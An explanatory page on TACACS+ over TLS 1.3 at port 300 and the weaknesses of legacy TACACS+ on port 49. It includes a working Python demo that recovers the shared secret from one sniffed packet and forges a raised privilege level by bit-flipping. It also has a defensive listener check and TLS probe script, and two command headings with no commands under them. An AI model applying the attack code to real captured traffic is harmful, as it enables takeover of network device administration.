Port 300 carries TACACS+ over TLS 1.3, a protocol for authenticating network administrators to routers, switches, and other network infrastructure. Every time a network engineer logs into a Cisco router remotely, there's a good chance TACACS+ is checking whether they should be allowed in.
The protocol has been around since 1993. Port 300 has existed since December 2024.1
Why Port 300 Exists
TACACS+ traditionally runs on TCP port 49, and has for over 30 years. The protocol was developed by Cisco and became the standard way to manage authentication, authorization, and accounting (AAA) for network devices.2
The problem: TACACS+ was never properly encrypted.
The original protocol used MD5-based obfuscation, not encryption, to hide packet contents: the packet body is XORed with a keystream of chained MD5 digests computed from the shared secret plus the session ID, version and sequence number, all of which travel in the cleartext header. One captured packet with predictable content (the first bytes of a login request, for instance) therefore reveals the keystream, and with the keystream in hand the shared secret can be brute-forced offline. Session IDs were too small. Headers weren't encrypted. There was no integrity checking, so an attacker could flip bits in a captured packet and the receiver would decode the altered value without noticing.3
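To make that weakness concrete, here is an added example, not code from this page, from RFC 8907 or from any TACACS+ implementation, that reimplements the RFC 8907 pseudo-pad in Python and runs both attacks against a constructed authentication START packet: recovering the shared secret from one sniffed packet plus a small wordlist, and raising the requested privilege level by flipping ciphertext bits. The shared secret, session ID, usernames and wordlist are made up; the 12-byte header layout, START body layout and MD5 chaining follow RFC 8907.

```python
"""Demo of RFC 8907 TACACS+ 'obfuscation' and two attacks on it.
Added example; all secrets, IDs and names below are constructed."""
import hashlib
import struct
from typing import Optional

TAC_PLUS_MAJOR_VER = 0xC       # major version 12, minor 0 -> header version byte 0xC0
TAC_PLUS_AUTHEN = 0x01         # packet type: authentication
TAC_PLUS_UNENCRYPTED_FLAG = 0x01


def pseudo_pad(session_id: int, key: bytes, version: int, seq_no: int, length: int) -> bytes:
    """RFC 8907 section 4.5: pad = MD5_1 | MD5_2 | ..., where
    MD5_1 = MD5(session_id, key, version, seq_no) and each later block
    appends the previous digest to the same input."""
    prefix = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(prefix + prev).digest()
        pad += prev
    return pad[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def build_packet(body: bytes, session_id: int, key: bytes, seq_no: int = 1) -> bytes:
    """12-byte header (always cleartext) followed by the XOR-obfuscated body."""
    version = (TAC_PLUS_MAJOR_VER << 4) | 0
    header = struct.pack("!BBBBII", version, TAC_PLUS_AUTHEN, seq_no, 0, session_id, len(body))
    return header + xor_bytes(body, pseudo_pad(session_id, key, version, seq_no, len(body)))


def parse_header(packet: bytes) -> dict:
    """Everything a sniffer needs for the pad, except the key, is readable here."""
    version, ptype, seq_no, flags, session_id, length = struct.unpack("!BBBBII", packet[:12])
    return {"version": version, "type": ptype, "seq_no": seq_no, "flags": flags,
            "session_id": session_id, "length": length}


def authen_start_body(user: bytes, port: bytes, rem_addr: bytes, priv_lvl: int = 1) -> bytes:
    """START for an ASCII login: action=LOGIN(1), priv_lvl, authen_type=ASCII(1),
    authen_service=LOGIN(1), four length bytes, then the variable fields."""
    return (bytes([0x01, priv_lvl, 0x01, 0x01, len(user), len(port), len(rem_addr), 0])
            + user + port + rem_addr)


def decrypt_body(packet: bytes, key: bytes) -> bytes:
    h = parse_header(packet)
    body = packet[12:12 + h["length"]]
    return xor_bytes(body, pseudo_pad(h["session_id"], key, h["version"], h["seq_no"], len(body)))


# Attack 1: known plaintext from one captured packet -> offline brute force of the shared secret.
def recover_secret(packet: bytes, known_prefix: bytes, wordlist) -> Optional[bytes]:
    """XOR the ciphertext with the predictable opening bytes of a login START to get the
    keystream, then test candidate secrets offline at one MD5 per guess."""
    h = parse_header(packet)
    keystream = xor_bytes(packet[12:12 + len(known_prefix)], known_prefix)
    for cand in wordlist:
        if pseudo_pad(h["session_id"], cand, h["version"], h["seq_no"], len(keystream)) == keystream:
            return cand
    return None


# Attack 2: no integrity check -> flip a plaintext bit by flipping the same ciphertext bit.
def forge_priv_lvl(packet: bytes, old_priv: int, new_priv: int) -> bytes:
    """priv_lvl is byte 1 of the START body (wire offset 13). XOR keystreams are malleable
    and RFC 8907 has no MAC, so the server decodes the altered privilege level unchallenged."""
    i = 12 + 1
    return packet[:i] + bytes([packet[i] ^ (old_priv ^ new_priv)]) + packet[i + 1:]


if __name__ == "__main__":
    SECRET = b"tac-secret-42"          # constructed shared secret
    SESSION_ID = 0x1A2B3C4D            # constructed session ID
    pkt = build_packet(authen_start_body(b"netadmin", b"tty1", b"10.0.0.5"), SESSION_ID, SECRET)
    known = bytes([0x01, 0x01, 0x01, 0x01])   # action, priv_lvl, authen_type, authen_service
    wordlist = [b"cisco", b"tacacs", b"tac-secret-42", b"password"]   # constructed
    print("header as seen on the wire:", parse_header(pkt))
    print("recovered secret:", recover_secret(pkt, known, wordlist))
    forged = forge_priv_lvl(pkt, 1, 15)
    print("priv_lvl the server decodes after forgery:", decrypt_body(forged, SECRET)[1])
```

Four known bytes give a 32-bit check per candidate, which is plenty to rule out wrong guesses from a wordlist; a real attacker would use the whole predictable prefix and a much larger list, and nothing in the protocol rate-limits the offline search.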
For decades, network administrators secured some of the most critical infrastructure on the Internet using a protocol with encryption weaker than what protects your grocery list app.
Port 300 is what happens when an industry admits the original design was insufficient and tries again.
How TACACS+ Over TLS Works
RFC 9887 defines TACACS+ over TLS 1.3.1 Instead of MD5-based obfuscation, a client connecting to TCP port 300 completes a full TLS 1.3 handshake before any TACACS+ data is exchanged; the TLS session, not the TACACS+ body, provides confidentiality and integrity.
The protocol supports two authentication methods:
- Certificate-based mutual authentication (mandatory to implement): both client and server verify each other's certificates, including revocation checking
- Pre-shared keys (optional): For constrained devices that can't handle certificate validation
The TACACS+ obfuscation mechanism defined in the original RFC 8907 specification is explicitly prohibited when operating over TLS: packets are sent with the protocol's unencrypted flag set and rely entirely on TLS for protection. If you're using port 300, you're using real encryption.4
The Protocol That Controls the Controllers
TACACS+ handles AAA for network infrastructure:
- Authentication: Is this person who they claim to be?
- Authorization: What commands are they allowed to run?
- Accounting: What did they actually do?
It provides granular, command-by-command authorization. An administrator might be allowed to view router configurations but not change them. The device sends each command to the TACACS+ server for a permit-or-deny decision before executing it, so policy is enforced per command rather than once per session.2
The protocol is modular—you can use TACACS+ for authentication but handle authorization elsewhere. This separation is one reason it became the standard for enterprise network management, particularly in environments using Cisco equipment.
Port 49 vs Port 300
Legacy TACACS+ continues to run on port 49. Port 300 is explicitly for the TLS 1.3 version.
This creates a migration path: enterprises can run both ports simultaneously while transitioning infrastructure. Older devices that don't support TLS continue using port 49. Modern devices connect to port 300. The caveat is that port 49 keeps the old exposure for as long as it stays open, so a migration plan needs a date for closing port 49, not just a date for opening port 300.
Port 300 UDP is marked as "Reserved" in the IANA registry—held for potential future use by the TACACS+ protocol, preventing other services from claiming it.5
Security Considerations
TACACS+ over TLS solves the encryption problems but doesn't eliminate all risks. The protocol still requires:
- Proper certificate management and revocation checking
- Secure key distribution for PSK deployments
- Network segmentation to prevent unauthorized access to TACACS+ servers
- Monitoring for authentication failures and unusual access patterns
Like any authentication system, TACACS+ over TLS is only as secure as the credentials and certificates protecting it.
The Honest Moment
Port 300 represents something unusual in Internet infrastructure: a protocol admitting its security model was broken and starting over.
Most legacy protocols limp along with incremental patches. TACACS+ got a new port number and a mandate to use modern encryption. Port 49 still exists—there are too many devices that can't be upgraded—but port 300 is the industry saying "we should have done this correctly the first time."
It's a rare second chance. Whether enterprises actually migrate to port 300 or continue running decades-old obfuscation on port 49 remains to be seen.
Related Ports
- Port 49: Legacy TACACS+ with MD5-based obfuscation
- Port 1812: RADIUS authentication (the competing AAA protocol)
- Port 1813: RADIUS accounting
How to Check What's Listening on Port 300
On Linux or macOS:
On Windows:
If you see port 300 open, something is listening there: most likely a TACACS+ server with TLS 1.3 support, but possibly something impersonating one. An open port proves only that much. Confirm it by completing a TLS 1.3 handshake and checking that the server's certificate chains to the CA you expect.
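As an added example (not the page's own commands, and not tied to any particular TACACS+ server), the Python below does the check in two steps and also illustrates the handshake described under "How TACACS+ Over TLS Works": it parses `ss -Hltn` output to list listeners on ports 300 and 49, then probes a port-300 listener with a TLS 1.3-only context that validates the server certificate against your CA and presents a client certificate, the mutual authentication RFC 9887 mandates. The `ss` sample lines, host names and certificate paths are constructed; `tacacs_listeners` and `verdict` work on captured text and run offline, while `probe_tacacs_tls` needs a reachable server plus your CA file, client certificate and key.

```python
"""Inventory TACACS+ listeners and verify a port-300 listener really speaks TLS 1.3.
Added example; the ss sample, hosts and file paths are constructed."""
import re
import socket
import ssl
import subprocess
from typing import Optional

# Ports from the page: 300 is the RFC 9887 TLS 1.3 service, 49 the legacy RFC 8907 one.
ROLES = {300: "tacacs-tls (RFC 9887, TLS 1.3)", 49: "legacy tacacs (RFC 8907 obfuscation)"}


def tacacs_listeners(ss_output: str) -> list:
    """Parse `ss -Hltn` lines (State Recv-Q Send-Q Local:Port Peer:Port [Process])
    and keep only listeners on 300 and 49."""
    found = []
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) < 5:
            continue
        m = re.match(r"^(.*):(\d+)$", cols[3])   # handles 0.0.0.0:300, [::]:300 and *:300
        if not m:
            continue
        port = int(m.group(2))
        if port in ROLES:
            found.append({"addr": m.group(1), "port": port, "role": ROLES[port]})
    return found


def local_listeners() -> list:
    """Run ss on this (Linux) host; on macOS use `lsof -nP -iTCP:300 -sTCP:LISTEN` instead."""
    out = subprocess.run(["ss", "-Hltn"], capture_output=True, text=True, check=True).stdout
    return tacacs_listeners(out)


def probe_tacacs_tls(host: str, port: int = 300, cafile: Optional[str] = None,
                     certfile: Optional[str] = None, keyfile: Optional[str] = None,
                     crlfile: Optional[str] = None, timeout: float = 5.0) -> dict:
    """RFC 9887-style handshake: TLS 1.3 only, server cert checked against cafile,
    our client cert offered for mutual auth, optional CRL check on the server's leaf."""
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_3    # a server that only offers TLS 1.2 fails here
    ctx.verify_flags |= ssl.VERIFY_X509_STRICT
    if certfile:
        ctx.load_cert_chain(certfile, keyfile)       # mutual authentication
    if crlfile:
        ctx.load_verify_locations(crlfile)           # revocation data for the leaf check
        ctx.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
    try:
        with socket.create_connection((host, port), timeout=timeout) as raw:
            with ctx.wrap_socket(raw, server_hostname=host) as tls:
                cert = tls.getpeercert()
                subject = {k: v for rdn in cert.get("subject", ()) for k, v in rdn}
                return {"ok": True, "version": tls.version(), "cipher": tls.cipher()[0],
                        "subject": subject, "not_after": cert.get("notAfter")}
    except ssl.SSLError as exc:      # bad chain, revoked cert, no TLS 1.3, or not TLS at all
        return {"ok": False, "error": f"TLS failure: {exc}"}
    except OSError as exc:           # refused, timed out, unreachable
        return {"ok": False, "error": f"connect failure: {exc}"}


def verdict(listeners: list, probe: Optional[dict] = None) -> str:
    """One-line summary of what the inventory and the (optional) probe established."""
    ports = {l["port"] for l in listeners}
    if 300 not in ports:
        return "legacy only (port 49)" if 49 in ports else "no TACACS+ listener"
    if probe is None:
        return "port 300 open, TLS 1.3 not yet verified"
    if probe["ok"] and probe["version"] == "TLSv1.3":
        return "port 300 open, TLS 1.3 with verified certificate"
    return f"port 300 open but handshake failed: {probe.get('error', probe.get('version'))}"


if __name__ == "__main__":
    found = local_listeners()
    for l in found:
        print(f"{l['addr']}:{l['port']}  {l['role']}")
    # Constructed paths; replace with your CA bundle and the client cert/key the server trusts.
    result = probe_tacacs_tls("tacacs.example.net", 300, cafile="/etc/pki/tacacs/ca.pem",
                              certfile="/etc/pki/tacacs/client.pem",
                              keyfile="/etc/pki/tacacs/client.key")
    print(result)
    print(verdict(found, result))
```

A handshake failure is the interesting outcome: `ssl.SSLError` covers a server that only negotiates TLS 1.2, a certificate that does not chain to your CA, a revoked leaf when a CRL is loaded, and a listener that is not TLS at all, which is exactly the "something impersonating one" case.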